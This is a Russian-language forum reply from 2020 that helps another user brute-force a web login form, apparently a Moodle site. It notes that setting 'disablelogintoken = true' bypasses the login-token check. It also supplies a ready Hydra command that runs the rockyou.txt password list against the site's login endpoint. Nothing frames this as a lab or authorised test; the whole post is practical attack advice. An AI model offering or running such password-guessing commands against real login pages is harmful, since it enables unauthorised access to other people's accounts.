07.12.2020, 20:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от 1fort23
1fort23 said:
↑
Как понял, disablelogintoken поможет обойти это дело смотря по коду.
Но вот проблема во времени.. Hydra справляется шустрее при подборе. Как я понимаю, для нее следует скачивать отдельные lib файлы и прописывать другую команду? ну если у вас есть возможность изменять конфиг, то тогда мне не понятно о чём вопрос. Но в принципе да, если вы можете прописать в конфиге
Код:
Code:
disablelogintoken = true
то тогда проверка тоже не выполняется.
Я не знаю что у вас не хватает, но в принципе что-то вроде
Код:
Code:
hydra -l -P /usr/share/wordlists/rockyou.txt https-post-form "/day/login/index.php:username=^USER^&password=^PASS^:F=Login failed!"
должно работать
|
|
|
|